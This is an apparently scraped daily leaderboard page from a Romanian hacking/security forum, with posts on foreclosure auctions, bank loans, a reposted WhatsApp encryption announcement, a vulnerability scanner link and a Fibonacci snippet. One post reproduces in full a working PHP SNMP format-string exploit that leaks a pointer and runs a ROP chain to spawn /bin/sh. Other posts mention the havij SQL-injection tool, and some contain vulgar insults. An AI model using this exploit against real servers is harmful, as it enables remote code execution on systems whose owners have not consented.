Leaderboard
Popular Content
Showing content with the highest reputation on 04/06/16 in all areas
-
1. Nu imi par deloc mici preturile . 2. Dupa ce castigi licitatia, poate dura si 2 ani pana intri in posesia bunului . 3. La apartamente e jale mare , majoritatea nu le poti vedea inainte de licitatie . 4. Cand vei vedea ca dai afara in ploaie 2- 3 copii plangand , nu cred ca o sa mai ai acelasi entuziasm . 5. Majoritatea celor executati sunt oameni onesti , nu merita asta . Pentru niste bancnote sa distrugi viata unei familii , chiar nu mi se pare in regula.6 points
-
@NETGEAR ,majoritatea celor executati sunt victimele bancilor din punct de vedere informational . Intamplator,in perioada cand se dadeau la greu credite in franci elvetieni,am contractat un credit de la o banca ,mai exact 60 mii lei . Mi-au dat doua variante : sa iau lei si sa platesc 1400 lei rata sau sa iau franci si sa platesc 1000 lei rata(echivalent) . Eu am ales lei si am fost un caz fericit ,cu toate ca la prima vedere am parut nebun . Foarte multi (majoritatea) au eles franci ,pentru ca era foarte tentant (mai ales la sune mari) si au ajuns acum in imposibilitatea de a achita rata lunara. Asta a fost doar un exemplu ,iti pot da si altele . Am ceva "experienta" in banci .2 points
-
WhatsApp has always prioritized making your data and communication as secure as possible. And today, we're proud to announce that we've completed a technological development that makes WhatsApp a leader in protecting your private communication: full end-to-end encryption. From now on when you and your contacts use the latest version of the app, every call you make, and every message, photo, video, file, and voice message you send, is end-to-end encrypted by default, including group chats. The idea is simple: when you send a message, the only person who can read it is the person or group chat that you send that message to. No one can see inside that message. Not cybercriminals. Not hackers. Not oppressive regimes. Not even us. End-to-end encryption helps make communication via WhatsApp private – sort of like a face-to-face conversation. If you're interested in learning more about how end-to-end encryption works, you can read about it here. But all you need to know is that end-to-end encrypted messages can only be read by the recipients you intend. And if you're using the latest version of WhatsApp, you don't have to do a thing to encrypt your messages: end-to-end encryption is on by default and all the time. We live in a world where more of our data is digitized than ever before. Every day we see stories about sensitive records being improperly accessed or stolen. And if nothing is done, more of people's digital information and communication will be vulnerable to attack in the years to come. Fortunately, end-to-end encryption protects us from these vulnerabilities. Encryption is one of the most important tools governments, companies, and individuals have to promote safety and security in the new digital age. Recently there has been a lot of discussion about encrypted services and the work of law enforcement. While we recognize the important work of law enforcement in keeping people safe, efforts to weaken encryption risk exposing people's information to abuse from cybercriminals, hackers, and rogue states. While WhatsApp is among the few communication platforms to build full end-to-end encryption that is on by default for everything you do, we expect that it will ultimately represent the future of personal communication. The desire to protect people's private communication is one of the core beliefs we have at WhatsApp, and for me, it's personal. I grew up in the USSR during communist rule and the fact that people couldn't speak freely is one of the reasons my family moved to the United States. Today more than a billion people are using WhatsApp to stay in touch with their friends and family all over the world. And now, every single one of those people can talk freely and securely on WhatsApp. Jan and Brian source : https://blog.whatsapp.com/10000618/end-to-end-encryption?1 point
-
1 point
-
1 point
-
Salut.Vezi ca merg downloadate si fara a avea cont.Si da, nici eu nu le pot vedea dar imi apare labelul de la idm la fiecare video.So, le poti downloada fara nicio problema. http://www.learnity.com/assets/getTutorialContentFileVAST-UoCPGd3MqXu93QuRVzetL1wRP739plxSKqpnmMxy5g2i3175nUI1RNAP04P4rDrv.m4v Asta e un exemplu de la un video... Si nu merg vizionate direct pe site, daca ai adblocker activ sau orice alt plugin care iti blocheaza reclamele.1 point
-
Vorbim de Romania, daca e miros de profit din cumpare si apoi vanzare, trebuie sa fie ceva mafie ascunsa, ca altfel nu pute a roman. So, alea de au pret de piata sunt alea legit, iar alea sub pretul de piata trebuie sa platesti 3 burtăhănoși si sa futi 2 curve de 60 ani ca sa ai access.1 point
-
Vulnerability scanner for Linux, agentless, written in golang. https://github.com/future-architect/vuls1 point
-
D.p.d.v al timpului de rulare, asta ar fii cea mai buna metoda de a calcula o serie fibonnaci in python: def moloz(n): a, b = 0, 1 for i in range(n): a, b = b, a + b return a1 point
-
Da, peste 90% din ele au stealer, keylogger, cryptolocker si alte magarii. O sa dau o geana pe cel mentionat de Byte-ul1 point
-
PHP <= 7.0.4/5.5.33 - SNMP Format String Exploit <?php // PHP <= 7.0.4/5.5.33 SNMP format string exploit (32bit) // By Andrew Kramer <andrew at jmpesp dot org> // Should bypass ASLR/NX just fine // This exploit utilizes PHP's internal "%Z" (zval) // format specifier in order to achieve code-execution. // We fake an object-type zval in memory and then bounce // through it carefully. First though, we use the same // bug to leak a pointer to the string itself. We can // then edit the global variable with correct pointers // before hitting it a second time to get EIP. This // makes it super reliable! Like... 100%. // To my knowledge this hasn't really been done before, but // credit to Stefan Esser (@i0n1c) for the original idea. It works! // https://twitter.com/i0n1c/status/664706994478161920 // All the ROP gadgets are from a binary I compiled myself. // If you want to use this yourself, you'll probably need // to build a new ROP chain and find new stack pivots for // whatever binary you're targeting. If you just want to get // EIP, change $stack_pivot_1 to 0x41414141 below. // pass-by-reference here so we keep things tidy function trigger(&$format_string) { $session = new SNMP(SNMP::VERSION_3, "127.0.0.1", "public"); // you MUST set exceptions_enabled in order to trigger this $session->exceptions_enabled = SNMP::ERRNO_ANY; try { $session->get($format_string); } catch (SNMPException $e) { return $e->getMessage(); } } // overwrite either $payload_{1,2} with $str at $offset function overwrite($which, $str, $offset) { // these need to be global so PHP doesn't just copy them global $payload_1, $payload_2; // we MUST copy byte-by-byte so PHP doesn't realloc for($c=; $c<strlen($str); $c++) { switch($which) { case 1: $payload_1[$offset + $c] = $str[$c]; break; case 2: $payload_2[$offset + $c] = $str[$c]; break; } } } echo "> Setting up payloads\n"; //$stack_pivot_1 = pack("L", 0x41414141); // Just get EIP, no exploit $stack_pivot_1 = pack("L", 0x0807c19f); // xchg esp ebx $stack_pivot_2 = pack("L", 0x0809740e); // add esp, 0x14 // this is used at first to leak the pointer to $payload_1 $leak_str = str_repeat("%d", 13) . $stack_pivot_2 . "Xw00t%lxw00t"; $trampoline_offset = strlen($leak_str); // used to leak a pointer and also to store ROP chain $payload_1 = $leak_str . // leak a pointer "XXXX" . // will be overwritten later $stack_pivot_1 . // initial EIP (rop start) // ROP: execve('/bin/sh',0,0) pack("L", 0x080f0bb7) . // xor ecx, ecx; mov eax, ecx pack("L", 0x0814491f) . // xchg edx, eax pack("L", 0x0806266d) . // pop ebx pack("L", 0x084891fd) . // pointer to /bin/sh pack("L", 0x0807114c) . // pop eax pack("L", 0xfffffff5) . // -11 pack("L", 0x081818de) . // neg eax pack("L", 0x081b5faa); // int 0x80 // used to trigger the exploit once we've patched everything $payload_2 = "XXXX" . // will be overwritten later "XXXX" . // just padding, whatevs "\x08X" . // zval type OBJECT str_repeat("%d", 13) . "%Z"; // trigger the exploit // leak a pointer echo "> Attempting to leak a pointer\n"; $data = trigger($payload_1); $trampoline_ptr = (int)hexdec((explode("w00t", $data)[1])) + $trampoline_offset; echo "> Leaked pointer: 0x" . dechex($trampoline_ptr) . "\n"; // If there are any null bytes or percent signs in the pointer, it will break // the -0x10 will be applied later, so do it now too if(strpos(pack("L", $trampoline_ptr - 0x10), "\x00") !== false || strpos(pack("L", $trampoline_ptr - 0x10), "%") !== false) { echo "> That pointer has a bad character in it\n"; echo "> This won't work. Bailing out... :(\n"; exit(); } echo "> Overwriting payload with calculated offsets\n"; // prepare the trampoline // code looks kinda like... // mov eax, [eax+0x10] // mov eax, [eax+0x54] // call eax overwrite(2, pack("L", $trampoline_ptr - 0x10), ); overwrite(1, pack("L", $trampoline_ptr - 0x54 + 4), $trampoline_offset); // exploit echo "> Attempting to pop a shell\n"; trigger($payload_2); // if we make it here, something didn't work echo "> Exploit failed :(\n"; Sursa: https://www.exploit-db.com/exploits/39645/1 point
-
1 point
-
primul lucru care l-a facut a fost sa copie codul de acolo si sa il puna in rubrica pasword din rar, pun pariu pe 50$1 point
-
" Mentionez ca script-ul nu imi apartine dar accept donatii :https://steamcommunity.com/tradeoffer/new/?partner=189467411&token=2VLN1Par " du-te-n mortii ma-tii, ce tupeu-1 points
-
Cred ca aia ar fi forma corecta in italiana, dar daca nu, salutare la toti. Ideea e simpla, NU ma numesc Miguel, si nu postez din NL. Vreau sa va salut pe toti, inclusiv baietii care castiga un ban decent si cinstit spionand forumurile de profil in numele organizatiilor guvernamentale gen SRI, DIICOT, BCCO si care or mai fi. Nu fac parte din nicio grupare terorista sau de hackeri profesionisti. Detin un website, care de curand mi-a fost atacat, crackuit, rupt in 2, sangereaza Si ce sa facem ca sa ne protejam? M-am gandit ca decat sa apelez la provider mai bine invat sa mi-l penetrez singur. Am descoperit havij, e super interesant si pentru a invata mai repede dupa tutoriale SCRISE - nu ca pe youtube - m-am gandit ca primul pas ar fi un user pe acest forum.-1 points
This leaderboard is set to Bucharest/GMT+02:00